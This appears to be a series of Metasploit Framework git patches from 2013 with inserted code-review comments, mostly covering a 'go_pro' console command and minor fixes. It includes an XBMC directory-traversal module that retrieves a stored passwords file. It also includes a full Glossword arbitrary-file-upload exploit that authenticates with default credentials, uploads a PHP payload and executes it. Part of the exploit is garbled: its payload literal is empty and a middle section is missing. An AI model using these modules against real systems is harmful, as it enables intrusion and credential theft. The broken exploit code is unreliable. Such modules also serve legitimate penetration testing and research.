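Review bot: `cmd_go_pro` checks `is_apt` before it parses its arguments, so `go_pro -h` on a non-apt install prints the Kali message instead of the help text; move the `@@go_pro_opts.parse(args)` block ahead of the `unless is_apt` guard. `is_apt` calls `File.exists?`, a deprecated alias whose supported name is `File.exist?`, and Ruby predicate convention would name the method `apt?` rather than `is_apt`. `msfbase_dir` climbs five `..` levels from this file; a comment naming the directory that is expected to land on would let a reader verify the count.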
From b221711ecdfed5d0648df1515657236dfef8efad Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Sat, 23 Feb 2013 10:24:04 -0500 Subject: [PATCH 054/139] Added basic error handling --- modules/auxiliary/gather/xbmc_traversal.rb | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-)
diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb
index 55c4a76a68..78124aaa1a 100644
--- a/modules/auxiliary/gather/xbmc_traversal.rb
+++ b/modules/auxiliary/gather/xbmc_traversal.rb
@@ -54,11 +54,16 @@ class Metasploit3 < Msf::Auxiliary
 # Create request
 traversal = "../" * datastore['DEPTH'] #The longest of all platforms tested was 9 deep
- res = send_request_raw({
- 'method' => 'GET',
- 'uri' => "/#{traversal}/#{datastore['FILEPATH']}",
- 'basic_auth' => "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
- }, 25)
+ begin
+ res = send_request_raw({
+ 'method' => 'GET',
+ 'uri' => "/#{traversal}/#{datastore['FILEPATH']}",
+ 'basic_auth' => "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
+ }, 25)
+ rescue Rex::ConnectionRefused
+ print_error("#{rhost}:#{rport} Could not connect.")
+ return
+ end
 # Show data if needed
 if res
From 90a1dcffa3dcb397577d32cb6191eab12f7bb788 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 09:36:06 -0600 Subject: [PATCH 055/139] Adds a random banner offering go_pro --- lib/msf/ui/console/command_dispatcher/core.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+)
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 9390939b03..24cfebf867 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
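Review bot: The new `rescue Rex::ConnectionRefused` handles only a refused connection; `send_request_raw` with a 25-second timeout can also raise `Rex::ConnectionTimeout` and `Rex::HostUnreachable`, which still escape `run` as unhandled exceptions. Rescuing the three together, `rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout`, matches the pattern the Kordil module earlier in this series uses. `run` continues outside the hunk.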
@@ -355,6 +355,20 @@ class Core # def cmd_banner(*args) banner = "%cya" + Banner.to_s + "%clr\n\n" + + if is_apt + content = [ + "Large pentest? List, sort, group, tag and search your hosts and services\nin Metasploit Pro -- type ‘go_pro’ to launch it now.", + "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- type ‘go_pro’ to launch it now.", + "Save your shells from AV! Upgrade to advanced AV evasion using dynamic\nexe templates with Metasploit Pro -- type ‘go_pro’ to launch it now.", + "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro’s wizard -- type ‘go_pro’ to launch it now.", + "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type ‘go_pro’ to launch it now.", + "Tired of typing ‘set RHOSTS’? Click & pwn with Metasploit Pro\n-- type ‘go_pro’ to launch it now." + ] + banner << content.sample + banner << "\n\n" + end + banner << " =[ %yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr\n" banner << "+ -- --=[ " banner << "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post\n" @@ -362,6 +376,7 @@ class Core oldwarn = nil avdwarn = nil + banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops\n" if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate) tstamp = ::Msf::Framework::RepoUpdatedDate.strftime("%Y.%m.%d") From b80343817ce30e9d92f17ec347bb577847720a55 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 09:48:18 -0600 Subject: [PATCH 056/139] Skeleton for acutally go_pro'ing --- lib/msf/ui/console/command_dispatcher/core.rb | 31 +++++++++++++++++-- 1 file changed, 29 insertions(+), 2 deletions(-) 
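Review bot: The `content` array in `cmd_banner` is rebuilt from six string literals every time the banner is printed; hoisting it into a frozen constant (for example `GoProBanners = [...].freeze`) keeps `cmd_banner` short and gives the marketing text one place to live. In the second hunk the `num_payloads` line is inserted after `oldwarn = nil` and `avdwarn = nil` rather than beside the `num_exploits` line it visually continues; the line between the two hunks is not visible here, so if output order matters this placement is worth checking. `cmd_banner` continues outside the hunk.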
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 24cfebf867..e80b3ffdd5 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -365,7 +365,7 @@ class Core "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type ‘go_pro’ to launch it now.", "Tired of typing ‘set RHOSTS’? Click & pwn with Metasploit Pro\n-- type ‘go_pro’ to launch it now." ] - banner << content.sample + banner << content.sample # Ruby 1.9-ism! banner << "\n\n" end @@ -2614,10 +2614,25 @@ class Core def cmd_go_pro(*args) unless is_apt - print_line " This command is only available on apt-based installations," + print_line " This command is only available on deb package installations," print_line " such as Kali Linux." return false end + unless metasploit_debian_package_installed + print_warning " You will want to install the 'metasploit' package first." + print_warning " Type 'apt-get install metasploit' to do this now." + return false + end + # If I've gotten this far, I know that this is apt-installed + # and the packages I need are here. + if metasploit_service_running + print_good " Metasploit services are running, launching a browser..." + launch_metasploit_browser + else + print_warning " Starting the Metasploit services. This will take a few minutes." + start_metasploit_service + launch_metasploit_browser + end @@go_pro_opts.parse(args) do |opt, idx, val| case opt when "-h" @@ -2628,6 +2643,18 @@ class Core return true end + def launch_metasploit_browser + end + + def start_metasploit_service + end + + def metasploit_service_running + end + + def metasploit_debian_package_installed + end + # Determines if this is an apt-based install def is_apt File.exists?(File.expand_path(File.join(msfbase_dir, '.apt'))) From 2c0a916c83b164c31f481510ae75c9d83fd6c840 Mon Sep 17 00:00:00 2001 
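Review bot: In `cmd_go_pro` the package check, service start and browser launch all run before `@@go_pro_opts.parse(args)`, so `go_pro -h` would start services and open a browser before printing help; parse the options first and return on `-h`. The four new helper methods are empty bodies that return `nil`, which means `metasploit_debian_package_installed` is always falsy and the command stops at the install warning until they are filled in; a `# TODO` in each stub would make that state explicit to anyone reading the file in between. `cmd_go_pro` continues outside the hunk.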
From: Matt Andreko Date: Sat, 23 Feb 2013 17:14:30 -0500 Subject: [PATCH 057/139] Made the password optional --- modules/auxiliary/gather/xbmc_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 78124aaa1a..c55c8034d5 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']), OptInt.new('DEPTH', [true, 'The max traversal depth', 9]), OptString.new('USERNAME', [true, 'The username to use for the HTTP server', 'xbmc']), - OptString.new('PASSWORD', [true, 'The password to use for the HTTP server', 'xbmc']), + OptString.new('PASSWORD', [false, 'The password to use for the HTTP server', 'xbmc']), ], self.class) end From a3886a1a6b54c5d03e540f881e6947b45ea3d01d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 17:17:18 -0600 Subject: [PATCH 058/139] No smartquotes plz --- lib/msf/ui/console/command_dispatcher/core.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index e80b3ffdd5..c2555cd9c3 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb 
@@ -358,12 +358,12 @@ class Core
 if is_apt
 content = [
- "Large pentest? List, sort, group, tag and search your hosts and services\nin Metasploit Pro -- type ‘go_pro’ to launch it now.",
- "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- type ‘go_pro’ to launch it now.",
- "Save your shells from AV! Upgrade to advanced AV evasion using dynamic\nexe templates with Metasploit Pro -- type ‘go_pro’ to launch it now.",
- "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro’s wizard -- type ‘go_pro’ to launch it now.",
- "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type ‘go_pro’ to launch it now.",
- "Tired of typing ‘set RHOSTS’? Click & pwn with Metasploit Pro\n-- type ‘go_pro’ to launch it now."
+ "Large pentest? List, sort, group, tag and search your hosts and services\nin Metasploit Pro -- type 'go_pro' to launch it now.",
+ "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- type 'go_pro' to launch it now.",
+ "Save your shells from AV! Upgrade to advanced AV evasion using dynamic\nexe templates with Metasploit Pro -- type 'go_pro' to launch it now.",
+ "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro’s wizard -- type 'go_pro' to launch it now.",
+ "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type 'go_pro' to launch it now.",
+ "Tired of typing ‘set RHOSTS’? Click & pwn with Metasploit Pro\n-- type 'go_pro' to launch it now."
 ]
 banner << content.sample # Ruby 1.9-ism!
 banner << "\n\n"
From d5a074283a0468907f367033802532c869d35f0f Mon Sep 17 00:00:00 2001
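Review bot: Two of the replaced strings still carry curly quotes — `Metasploit Pro’s wizard` in the fourth entry and `‘set RHOSTS’` in the sixth — so the change only partly achieves what its title states; `Metasploit Pro's wizard` and `'set RHOSTS'` would finish the job for the same reason the `'go_pro'` quotes were normalised.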
From: Tod Beardsley Date: Sat, 23 Feb 2013 22:38:23 -0600 Subject: [PATCH 059/139] Fill in the details of starting, launching, etc --- lib/msf/ui/console/command_dispatcher/core.rb | 42 +++++++++++++++++-- 1 file changed, 38 insertions(+), 4 deletions(-)
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index c2555cd9c3..8883e7f713 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -2618,14 +2618,14 @@ class Core
 print_line " such as Kali Linux."
 return false
 end
- unless metasploit_debian_package_installed
+ unless is_metasploit_debian_package_installed
 print_warning " You will want to install the 'metasploit' package first."
 print_warning " Type 'apt-get install metasploit' to do this now."
 return false
 end
 # If I've gotten this far, I know that this is apt-installed
 # and the packages I need are here.
- if metasploit_service_running
+ if is_metasploit_service_running
 print_good " Metasploit services are running, launching a browser..."
 launch_metasploit_browser
 else
@@ -2644,15 +2644,49 @@ class Core end def launch_metasploit_browser + cmd = "/usr/bin/xdg-open" + return unless ::File.executable_real? cmd + svc_log = File.join(msf_base, ".." , "engine", "prosvc_stdout.log") + return unless ::File.readable_real? svc_log + really_started = false + # This method is a little lame but it's a short enough file that it + # shouldn't really matter that we reopen it a few times. + until really_started + select(3,nil,nil,nil) + log_data = ::File.open(svc_log, "rb") {|f| f.read f.stat.size} + really_started = log_data =~ /^\[\*\] Ready/ # This is webserver ready, not totally ready. + print_raw "." unless really_started + end + system(cmd, "https://localhost:3790") end def start_metasploit_service + cmd = "/usr/sbin/service" + return unless ::File.executable_real? cmd + %x{#{cmd} metasploit start}.each_line do |line| + print_status line + end end - def metasploit_service_running + def is_metasploit_service_running + cmd = "/usr/sbin/service" + return unless ::File.executable_real? cmd + services = %x{#{cmd} metasploit status} + expected = "Metasploit %s server is running." + %w{web rpc}.each do |svc| + return false unless services.include?(expected % svc) + end end - def metasploit_debian_package_installed + def is_metasploit_debian_package_installed + cmd = "/usr/bin/dpkg" + return unless ::File.executable_real? cmd + installed_packages = %x{#{cmd} -l 'metasploit'} + installed_packages.each_line do |line| + if line =~ /^.i metasploit / # Yes, trailing space + return true + end + end end # Determines if this is an apt-based install From a7c0d621062389edae7dd03a97e127b0b42fab2d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 23:33:08 -0600 Subject: [PATCH 060/139] Cleanup after some testing --- lib/msf/ui/console/command_dispatcher/core.rb | 34 +++++++++++++------ 1 file changed, 23 insertions(+), 11 deletions(-) 
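Review bot: `is_metasploit_debian_package_installed` returns the dpkg output string when no line matches, because `installed_packages.each_line` returns its receiver and nothing follows it, so a missing package still reads as installed to `cmd_go_pro`; `is_metasploit_service_running` likewise ends with the `%w{web rpc}` array and is truthy only by accident. Append `return false` after the `each_line` block and `return true` after the `each` block so both predicates yield booleans. `select(3,nil,nil,nil)` in `launch_metasploit_browser` passes the timeout as the read set and will raise a TypeError; `sleep 3` is what is meant. That `until really_started` loop also has no upper bound and will poll the log forever if the `[*] Ready` line never appears. Ruby convention for predicates is a trailing `?` (`metasploit_service_running?`) rather than an `is_` prefix.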
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 8883e7f713..c9a0bc012e 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2620,18 +2620,20 @@ class Core end unless is_metasploit_debian_package_installed print_warning " You will want to install the 'metasploit' package first." - print_warning " Type 'apt-get install metasploit' to do this now." + print_warning " Type 'apt-get install metasploit' to do this now, then try 'go_pro' again." return false end # If I've gotten this far, I know that this is apt-installed # and the packages I need are here. if is_metasploit_service_running - print_good " Metasploit services are running, launching a browser..." launch_metasploit_browser else - print_warning " Starting the Metasploit services. This will take a few minutes." + print_status "Starting the Metasploit services. This can take a little time." start_metasploit_service - launch_metasploit_browser + select(nil,nil,nil,3) + if is_metasploit_service_running + launch_metasploit_browser + end end @@go_pro_opts.parse(args) do |opt, idx, val| case opt 
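Review bot: `select(nil,nil,nil,3)` is used purely as a delay; `sleep 3` says so directly, here and in the two places the same idiom appears in the `launch_metasploit_browser` hunk on the next line. After that single three-second wait, if `is_metasploit_service_running` is still false the command simply ends with no output, so the user cannot tell whether the start failed or is merely slow; a `print_error` on the falling branch, or looping on the check a few times, would make the outcome visible. `cmd_go_pro` continues past the end of this hunk.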
@@ -2646,25 +2648,33 @@ class Core def launch_metasploit_browser cmd = "/usr/bin/xdg-open" return unless ::File.executable_real? cmd - svc_log = File.join(msf_base, ".." , "engine", "prosvc_stdout.log") + svc_log = File.expand_path(File.join(msfbase_dir, ".." , "engine", "prosvc_stdout.log")) return unless ::File.readable_real? svc_log really_started = false # This method is a little lame but it's a short enough file that it - # shouldn't really matter that we reopen it a few times. + # shouldn't really matter that we open and close it a few times. until really_started - select(3,nil,nil,nil) + select(nil,nil,nil,3) log_data = ::File.open(svc_log, "rb") {|f| f.read f.stat.size} - really_started = log_data =~ /^\[\*\] Ready/ # This is webserver ready, not totally ready. - print_raw "." unless really_started + really_started = log_data =~ /^\[\*\] Ready/ # This is webserver ready + if really_started + print_line + print_good "The web UI is up and running, connecting with your default browser." + print_good "If this is your first time connecting, you will be presented with" + print_good "a self-signed certificate warning. Accept it to create a new user." + select(nil,nil,nil,7) + system(cmd, "https://localhost:3790") + else + print "." + end end - system(cmd, "https://localhost:3790") end def start_metasploit_service cmd = "/usr/sbin/service" return unless ::File.executable_real? cmd %x{#{cmd} metasploit start}.each_line do |line| - print_status line + print_status line.chomp end end @@ -2676,6 +2686,7 @@ class Core %w{web rpc}.each do |svc| return false unless services.include?(expected % svc) end + return true end def is_metasploit_debian_package_installed @@ -2687,6 +2698,7 @@ class Core return true end end + return false end # Determines if this is an apt-based install From 8caedd42903ac9a5d55cb3fffee636d70baa97d9 Mon Sep 17 00:00:00 2001 
From: Tod Beardsley Date: Sat, 23 Feb 2013 23:41:04 -0600 Subject: [PATCH 061/139] Can't apt-get install inside msfconsole At least, you can't and expect the service to connect correctly. You must exit msfconsole and restart it for the migrations to take place. --- lib/msf/ui/console/command_dispatcher/core.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index c9a0bc012e..801da07009 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2619,8 +2619,9 @@ class Core return false end unless is_metasploit_debian_package_installed - print_warning " You will want to install the 'metasploit' package first." - print_warning " Type 'apt-get install metasploit' to do this now, then try 'go_pro' again." + print_warning "You needs to install the 'metasploit' package first." + print_warning "Type 'apt-get install metasploit' to do this now, then exit" + print_warning "and restart msfconsole to try again." return false end # If I've gotten this far, I know that this is apt-installed @@ -2633,6 +2634,8 @@ class Core select(nil,nil,nil,3) if is_metasploit_service_running launch_metasploit_browser + else + print_error "Metasploit services aren't running. Type 'service start metasploit' and try again." end end @@go_pro_opts.parse(args) do |opt, idx, val| From 1f46b3aa029111f2b8140c36e07e48a77697aae6 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 25 Feb 2013 01:59:46 +1030 Subject: [PATCH 062/139] Add Glossword Arbitrary File Upload Vulnerability exploit --- .../multi/http/glossword_upload_exec.rb | 192 ++++++++++++++++++ 1 file changed, 192 insertions(+) create mode 100644 modules/exploits/multi/http/glossword_upload_exec.rb diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb new file mode 100644 index 0000000000..74ca5c1a1a 
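Review bot: The new `print_error` in the second hunk tells the user to type `'service start metasploit'`, but the invocation `start_metasploit_service` itself runs is `service metasploit start` (service name before action), so following the message fails with an unknown-service error. Change it to `print_error "Metasploit services aren't running. Type 'service metasploit start' and try again."`. `cmd_go_pro` starts and ends outside these hunks.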
--- /dev/null +++ b/modules/exploits/multi/http/glossword_upload_exec.rb 
@@ -0,0 +1,192 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability", + 'Description' => %q{ + This module exploits a file upload vulnerability in Glossword + versions 1.8.8 to 1.8.12 when run as a standalone application. + This application has an upload feature that allows an authenticated user + with administrator roles to upload arbitrary files to the 'gw_temp/a/' + directory. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AkaStep', # Discovery + 'Brendan Coles ' # metasploit exploit + ], + 'References' => + [ + [ 'EDB', '24456' ], + [ 'OSVDB' '89960' ] + ], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Automatic Targeting', { 'auto' => true }]], + 'Privileged' => true, + 'DisclosureDate' => "Feb 05 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to the web application', '/glossword/1.8/']), + OptString.new('USERNAME', [true, 'The username for Glossword', 'admin']), + OptString.new('PASSWORD', [true, 'The password for Glossword', 'admin']) + ], self.class) + end + + def check + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + peer = "#{rhost}:#{rport}" + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + # login + print_status("#{peer} - Authenticating as user '#{user}'") + begin + res = login(base, user, pass) + if res and res.code == 200 + print_error("#{peer} - Authentication failed") + return Exploit::CheckCode::Unknown + elsif res.code == 301 and res.headers['set-cookie'] =~ 
/sid([\da-f]+)=([\da-f]{32})/ + print_good("#{peer} - Authenticated successfully") + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Safe + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + print_error("#{peer} - Connection failed") + end + return Exploit::CheckCode::Unknown + + end + + def on_new_session(client) + if client.type == "meterpreter" + client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") + client.fs.file.rm("#{@fname}") + else + client.shell_command_token("rm #{@fname}") + end + end + + def upload(base, sid, fname, file) + + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + data = Rex::MIME::Message.new + data.add_part(file, 'application/x-php', nil, "form-data; name=\"file_location\"; filename=\"#{fname}\"") + data.add_part("edit-own", nil, nil, 'form-data; name="a"') + data.add_part("users", nil, nil, 'form-data; name="t"') + data.add_part("Save", nil, nil, 'form-data; name="post"') + data.add_part("#{sid}", nil, nil, 'form-data; name="sid"') + data.add_part("#{user}", nil, nil, 'form-data; name="arPost[login]"') + data.add_part("#{pass}", nil, nil, 'form-data; name="arPost[pass_new]"') + data.add_part("#{pass}", nil, nil, 'form-data; name="arPost[pass_confirm]"') + + data_post = data.to_s + data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}gw_admin.php", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data_post, + }) + + return res + end + + def login(base, user, pass) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}gw_login.php", + 'data' => "arPost%5Buser_name%5D=#{user}&arPost%5Buser_pass%5D=#{pass}&arPost%5Blocale_name%5D=en-utf8&a=login&sid=&post=Enter" + }) + return res + + end + + def exploit + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + @peer = "#{rhost}:#{rport}" + @fname= rand_text_alphanumeric(rand(10)+6) + 
'.php' + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + # login; get session id and token + print_status("#{@peer} - Authenticating as user '#{user}'") + res = login(base, user, pass) + if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ + token = "#{$1}" + sid = "#{$2}" + print_good("#{@peer} - Authenticated successfully") + else + fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") + end + + # upload PHP payload + print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + php = %Q|| + begin + res = upload(base, sid, @fname, php) + if res and res.code == 301 and res['location'] =~ /Setting saved/ + print_good("#{@peer} - File uploaded successfully") + else + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + # retrieve PHP file path + print_status("#{@peer} - Locating PHP payload file") + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}gw_admin.php?a=edit-own&t=users", + 'cookie' => "sid#{token}=#{sid}" + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + if res and res.code == 200 and res.body =~ / 'GET', + 'uri' => "#{base}#{shell_uri}", + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + if !res or res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Executing payload failed") + end + end +end From 8010cdbd8bf32487f4f36f0126128df7b45e2171 Mon Sep 17 00:00:00 2001 
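Review bot: The `'References'` entry `[ 'OSVDB' '89960' ]` is missing a comma, so Ruby concatenates the adjacent literals into the single string `'OSVDB89960'` and the reference is malformed; it should read `[ 'OSVDB', '89960' ]`. In `login`, `user` and `pass` are interpolated raw into the form body, so a credential containing `&`, `=`, `%` or `+` yields a different request than intended; passing them as `'vars_post' => { 'arPost[user_name]' => user, 'arPost[user_pass]' => pass, ... }` lets the client encode them. `base << '/'` in both `check` and `exploit` mutates the string returned by `target_uri.path` in place; `base = "#{base}/" unless base.end_with?('/')` avoids the side effect. The middle of `exploit`, between the payload literal and the path regex, is garbled in this rendering and is not reviewed here.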
From: Tod Beardsley Date: Sun, 24 Feb 2013 09:33:15 -0600 Subject: [PATCH 063/139] Shuffled methods around --- lib/msf/ui/console/command_dispatcher/core.rb | 30 +++++++++++-------- 1 file changed, 17 insertions(+), 13 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 801da07009..16992f3a54 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2613,19 +2613,26 @@ class Core end def cmd_go_pro(*args) + @@go_pro_opts.parse(args) do |opt, idx, val| + case opt + when "-h" + cmd_go_pro_help + return false + end + end unless is_apt print_line " This command is only available on deb package installations," print_line " such as Kali Linux." return false end unless is_metasploit_debian_package_installed - print_warning "You needs to install the 'metasploit' package first." - print_warning "Type 'apt-get install metasploit' to do this now, then exit" + print_warning "You need to install the 'metasploit' package first." + print_warning "Type 'apt-get install -y metasploit' to do this now, then exit" print_warning "and restart msfconsole to try again." return false end - # If I've gotten this far, I know that this is apt-installed - # and the packages I need are here. + # If I've gotten this far, I know that this is apt-installed, the + # metasploit package is here, and I'm ready to rock. if is_metasploit_service_running launch_metasploit_browser else @@ -2638,16 +2645,15 @@ class Core print_error "Metasploit services aren't running. Type 'service start metasploit' and try again." end end - @@go_pro_opts.parse(args) do |opt, idx, val| - case opt - when "-h" - cmd_go_pro_help - return false - end - end return true end + protected + + # + # Go_pro methods -- these are used to start and connect to the + # web UI. + def launch_metasploit_browser cmd = "/usr/bin/xdg-open" return unless ::File.executable_real? cmd 
@@ -2709,8 +2715,6 @@ class Core File.exists?(File.expand_path(File.join(msfbase_dir, '.apt'))) end -protected - # # Module list enumeration # From 5e1119e2ed04bd0f31bb47cd13d76fac73863260 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sun, 24 Feb 2013 10:23:07 -0600 Subject: [PATCH 064/139] A little more error handling for browser launches Implement a timeout and deal with the case where xdg-open isn't avialable for whatever reason. --- lib/msf/ui/console/command_dispatcher/core.rb | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 16992f3a54..8d0b37c304 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2656,12 +2656,17 @@ class Core def launch_metasploit_browser cmd = "/usr/bin/xdg-open" - return unless ::File.executable_real? cmd + unless ::File.executable_real? cmd + print_warning "Can't figure out your default browser, please visit https://localhost:3790" + print_warning "to start the web UI version of Metasploit." + return false + end svc_log = File.expand_path(File.join(msfbase_dir, ".." , "engine", "prosvc_stdout.log")) return unless ::File.readable_real? svc_log really_started = false # This method is a little lame but it's a short enough file that it # shouldn't really matter that we open and close it a few times. + timeout = 0 until really_started select(nil,nil,nil,3) log_data = ::File.open(svc_log, "rb") {|f| f.read f.stat.size} 
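Review bot: `return unless ::File.readable_real? svc_log` in the first hunk still exits silently when the engine log cannot be read (for instance when msfconsole runs as a different user than the service), while the `xdg-open` branch just above now explains itself, so the user gets neither a browser nor a message. Mirror the new pattern with `print_warning "Can't read #{svc_log}; visit https://localhost:3790 once the services are up."` followed by `return false`. The local `timeout` is a poll counter rather than a duration and is easily confused with `Timeout#timeout`; `polls` or `attempts` would be clearer. `launch_metasploit_browser` continues into the next hunk.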
@@ -2673,8 +2678,15 @@ class Core print_good "a self-signed certificate warning. Accept it to create a new user." select(nil,nil,nil,7) system(cmd, "https://localhost:3790") + elsif timeout >= 200 # 200 * 3 seconds is 10 minutes and that is tons of time. + print_line + print_warning "For some reason, the web UI didn't start in a timely fashion." + print_warning "You might want to restart the Metasploit services by typing" + print_warning "'service metasploit restart' . Sorry it didn't work out." + return false else print "." + timeout += 1 end end end From 9d9d83cf8b262094fa9c35a9bb888ae4d4d16033 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 24 Feb 2013 11:06:29 -0600 Subject: [PATCH 065/139] Implement per-target arch/platform searches SeeRM #7754 --- lib/msf/core/db_manager.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 914d126c71..a5bdf41fef 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -497,6 +497,14 @@ class DBManager m.targets.each_index do |i| bits << [ :target, { :index => i, :name => m.targets[i].name.to_s } ] + if m.targets[i].platform + m.targets[i].platform.platforms.each do |name| + bits << [ :platform, { :name => name.to_s.split('::').last.downcase } ] + end + end + if m.targets[i].arch + bits << [ :arch, { :name => m.targets[i].arch.to_s } ] + end end if (m.default_target) @@ -525,7 +533,7 @@ class DBManager res[:stance] = m.passive? ? "passive" : "aggressive" end - res[:bits] = bits + res[:bits] = bits.uniq res end From 8e8fecd20807dadfa561d77624d8ab27dd0c6165 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 24 Feb 2013 13:10:16 -0600 Subject: [PATCH 066/139] Prefer String#encode over Iconv for Ruby 2.0 compat --- lib/rex/text.rb | 23 